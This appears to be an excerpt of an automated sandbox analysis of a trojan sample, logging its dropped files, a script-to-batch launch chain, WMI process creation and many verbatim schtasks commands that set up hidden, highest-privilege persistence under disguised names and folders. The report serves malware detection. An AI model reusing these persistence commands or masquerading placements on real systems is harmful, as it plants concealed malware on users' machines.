            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D5718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00D5718C
            Source: C:\bridgeportserver\blockServerruntime.exeFile created: C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exeJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeFile created: C:\Windows\Provisioning\Packages\c4950d50751633Jump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeFile created: C:\Windows\addins\RuntimeBroker.exeJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeFile created: C:\Windows\addins\9e8d7a4ca61bd9Jump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D5857B0_2_00D5857B
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D670BF0_2_00D670BF
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D5407E0_2_00D5407E
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D7D00E0_2_00D7D00E
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D811940_2_00D81194
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D702F60_2_00D702F6
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D532810_2_00D53281
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D5E2A00_2_00D5E2A0
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D666460_2_00D66646
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D637C10_2_00D637C1
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D527E80_2_00D527E8
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D7070E0_2_00D7070E
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D7473A0_2_00D7473A
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D5E8A00_2_00D5E8A0
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D5F9680_2_00D5F968
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D749690_2_00D74969
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D66A7B0_2_00D66A7B
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D63A3C0_2_00D63A3C
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D70B430_2_00D70B43
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D7CB600_2_00D7CB60
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D65C770_2_00D65C77
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D6FDFA0_2_00D6FDFA
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D63D6D0_2_00D63D6D
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D5ED140_2_00D5ED14
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D5DE6C0_2_00D5DE6C
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D5BE130_2_00D5BE13
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D70F780_2_00D70F78
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D55F3C0_2_00D55F3C
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAA34344_2_00007FFD9BAA3434
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAAA85D4_2_00007FFD9BAAA85D
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAAC8254_2_00007FFD9BAAC825
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAAAE504_2_00007FFD9BAAAE50
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAAAD084_2_00007FFD9BAAAD08
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAACB204_2_00007FFD9BAACB20
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAA2BC04_2_00007FFD9BAA2BC0
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAAC6604_2_00007FFD9BAAC660
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAACE084_2_00007FFD9BAACE08
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAA9D944_2_00007FFD9BAA9D94
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAA2BC04_2_00007FFD9BAA2BC0
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAAAC704_2_00007FFD9BAAAC70
            Source: C:\bridgeportserver\blockServerruntime.exeCode function: 4_2_00007FFD9BAA2BC04_2_00007FFD9BAA2BC0
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeCode function: 11_2_00007FFD9BAC35D511_2_00007FFD9BAC35D5
            Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeCode function: 12_2_00007FFD9BAB35D512_2_00007FFD9BAB35D5
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeCode function: 28_2_00007FFD9BAB35D528_2_00007FFD9BAB35D5
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeCode function: 28_2_00007FFD9BAC59D028_2_00007FFD9BAC59D0
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: String function: 00D6E28C appears 35 times
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: String function: 00D6E360 appears 52 times
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: String function: 00D6ED00 appears 31 times
            Source: blockServerruntime.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe0.4.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: N0tepkRPzw.exe, 00000000.00000002.1639537456.0000000000832000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs N0tepkRPzw.exe
            Source: N0tepkRPzw.exe, 00000000.00000003.1638625567.0000000000832000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs N0tepkRPzw.exe
            Source: N0tepkRPzw.exe, 00000000.00000003.1635646151.00000000069F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs N0tepkRPzw.exe
            Source: N0tepkRPzw.exe, 00000000.00000003.1636182537.0000000006974000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs N0tepkRPzw.exe
            Source: N0tepkRPzw.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs N0tepkRPzw.exe
            Source: N0tepkRPzw.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, BPlkEZbgpdgWkPvxeOi.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, BPlkEZbgpdgWkPvxeOi.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, MjjxtyMa5nCfqTWWnQR.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, MjjxtyMa5nCfqTWWnQR.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, BPlkEZbgpdgWkPvxeOi.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, BPlkEZbgpdgWkPvxeOi.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, MjjxtyMa5nCfqTWWnQR.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, MjjxtyMa5nCfqTWWnQR.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, jFJRA1UwfdLv83E9OYu.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.N0tepkRPzw.exe.69f7f3a.1.raw.unpack, jFJRA1UwfdLv83E9OYu.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, jFJRA1UwfdLv83E9OYu.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.N0tepkRPzw.exe.60f9f3a.0.raw.unpack, jFJRA1UwfdLv83E9OYu.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@34/19@1/1
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D56EC9 GetLastError,FormatMessageW,0_2_00D56EC9
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCode function: 0_2_00D69E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00D69E1C
            Source: C:\bridgeportserver\blockServerruntime.exeFile created: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exeJump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeFile created: C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exeJump to behavior
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeMutant created: NULL
            Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exeMutant created: \Sessions\1\BaseNamedObjects\Local\520eeca605f8c5b2f04fdb8c484381742810b4c4
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeportserver\8nlgr42PAYPKgwQGCAUD8OnyAwE.bat" "
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCommand line argument: sfxname0_2_00D6D5D4
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCommand line argument: sfxstime0_2_00D6D5D4
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeCommand line argument: STARTDLG0_2_00D6D5D4
            Source: N0tepkRPzw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: N0tepkRPzw.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\bridgeportserver\blockServerruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: N0tepkRPzw.exeReversingLabs: Detection: 68%
            Source: N0tepkRPzw.exeVirustotal: Detection: 58%
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeFile read: C:\Users\user\Desktop\N0tepkRPzw.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\N0tepkRPzw.exe "C:\Users\user\Desktop\N0tepkRPzw.exe"
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeportserver\8nlgr42PAYPKgwQGCAUD8OnyAwE.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgeportserver\blockServerruntime.exe "C:\bridgeportserver\blockServerruntime.exe"
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 5 /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 11 /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 8 /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe "C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
            Source: unknownProcess created: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe "C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 10 /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 8 /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\addins\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe "C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\bridgeportserver\8nlgr42PAYPKgwQGCAUD8OnyAwE.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\bridgeportserver\blockServerruntime.exe "C:\bridgeportserver\blockServerruntime.exe"Jump to behavior
            Source: C:\bridgeportserver\blockServerruntime.exeProcess created: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe "C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe" Jump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\N0tepkRPzw.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
